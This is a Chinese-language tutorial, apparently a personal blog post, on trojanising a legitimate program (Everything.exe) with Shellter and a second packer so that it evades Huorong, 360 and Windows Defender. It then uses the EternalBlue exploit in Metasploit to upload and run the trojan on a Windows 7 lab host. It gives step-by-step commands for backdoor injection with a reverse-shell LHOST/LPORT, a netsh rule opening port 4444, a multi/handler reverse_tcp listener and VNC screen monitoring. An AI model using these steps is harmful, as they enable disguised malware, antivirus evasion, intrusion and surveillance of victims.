首先这个文章是重点针对于加壳免杀的一个文章如果你是想在这个地方重点学习永恒之蓝或者利用msfvenom来生成后门木马,可以私信我给你们发word版的笔记,由于我也是一个新手,如果有不对的地方,希望有大佬可以指出。
那么下面进入正题第一步加壳工具的安装和使用方法:
第一步确定你所需要的版本,这里的加壳工具shellter有两个版本第一个版本是kali版安装步骤如下:
apt-get update //更新
apt-get install shellter //在线安装
在kali上使用需要安装wine和wine32(可以让linux运行exe),wine是kali自带,使用如下命令安装wine32。
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
//选择一个exe可执行文件(32位)
安装完之后是这样一个效果:
但是我使用kali2021版安装的虚拟机,但是我创建了三台kali的虚拟机,都遇到了同样的问题,网上查询也没有结果,我将问题以图片的形式呈现给大家看(分别是我的不正常情况和正常的情况进行对比)
至今这个问题也没有解决,于是我就决定安装Windows版本的shellter,那么这个版本的shellter这么安装呢?
解决办法是找到shellter的官网下载,由于是外网速度比较慢,而且我遇到了这样的问题:
但是这个网址可以直接下载,非常好用
https://www.shellterproject.com/Downloads/Shellter/Latest/shellter.zip
记住针对于win11系统由于安全度比较高,我在win11系统上安装使用shellter的时候就算是关闭所有的杀毒软件,电脑自带的安全系统都关闭的情况下都没办法去正常安装,一安装就会被查杀。
所以我建议win11系统的读者可以安装win10的虚拟机在那里面进行shellter这个环节的操作,这样也可以锻炼跨多个虚拟机工作。(哈哈哈哈哈哈哈哈哈)
使用步骤如下:首先需要去寻找一个正常的软件,但前提是需要一个32位的软件,因为shellter只能去对32位的软件进行操作:那么我也是找了一个32位的软件
https://www.voidtools.com/Everything-1.4.1.1017.x86.zip
点击连接下载这个软件用于实验。
然后就是将这个压缩包拖到win10系统进行操作,看看能否成功
其中:
Choose Operation Mode - Auto/Manual (A/M/H):A //A:自动模式自动注入后门,M:高级模式,H:帮助
这里我选择A
表示是否启用隐身模式,建议不启用,可以增加免杀效果
Enable Stealth Mode? (Y/N/H): Y //是否启用隐身模式 Y:启用 N:不启用 H:帮助
这是设置IP和Port
SET LHOST: 192.168.145.135 //设置反弹回来的IP 本机(kali的IP地址)
SET LPORT:4444 //设置接收反弹的端口
将生成的everything.exe程序拖到win11中进行二次加密伪装
如图所示将一次伪装的木马拖入shielden当中进行如图的操作然后在生成新的木马
新生成的木马名字是会发生改变的这里也是十分好辨认
将一次加密和二次加密的软件都放在win11主机上用火绒查杀发现经过二次加密后就没办法被火绒查杀,而且经过测试发现,只经过一次加壳就连微软的主机自带的杀毒也没办法过,可见两次加密必不可少。
可以看到经过两次加壳的木马没有被火绒查杀,而那个只是经过shellter伪装过的木马被查出来了。
但是当我将360安全卫士也加入查杀的阵营时得到了如下的结果
可以看到火绒和360查杀出来的木马不是同一个,360查出了经过两次加壳的木马,而没有查出第一次加壳的木马,而火绒恰好相反,查出了第一次加壳的木马,没查出第二次,这从文件的名字不难看出。
那么这个木马制作完成之后就要看看到底是否可行。
那么之前的所有工作都是介绍如何安装和使用加壳软件,以及在这个过程中遇到的问题,那么下面才是核心的步骤就是先使用永恒之蓝去连接win7然后上传木马,那么就开始下一步:
使用永恒之蓝上传病毒(而实际上应该是诱导用户自己去下载,这里是结合运用以学习的知识)
永恒之蓝的简单运用在之前的分享中我也是演示过这里就简单的介绍一下如何使用
msfconsole //进入 msf模块
use ms17_010 //使用永恒之蓝
use 0 //使用攻击模块
run //开始攻击
攻击成功的标志。
将带有木马的软件上传到win7中
upload 文件的名称 +上传到主机的什么位置
这里也是操作成功了(我本来想直接将那个木马拖入到win7当中的但是发现其他的虚拟机都允许 将主机的软件直接拖入到这些虚拟机当中但是windows7系统却不行,希望有大佬可以解答)
上传成功之后需要使用永恒之蓝打开目标靶机的4444端口然后就可以去确保木马的正常运行
操作步骤如下。
在meterpreter的前提下执行如下命令。
shell //打开命令端
chcp 65001 //解决乱码的情况
SF永恒之蓝运行:
shell
开启4444端口
netsh advfirewall firewall add rule name="Open Port 4444" dir=in action=allow protocol=TCP localport=4444 enable=yes
cd 到带有木马下的目录
Everything_se.exe 运行该木马
然后就打开另外一个命令端口
在运行之前打开其安全系统并在kali运行木马,看是否可以成功
MSF启动监听:
msfconsloe
配置如下:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.145.155
set lport 4444
run //运行
那么也是成功入侵而且是在防火墙开启的情况下,
那么就对于所监视的主机进行屏幕的监视
命令如下: run vnc -i //监视目标主机的屏幕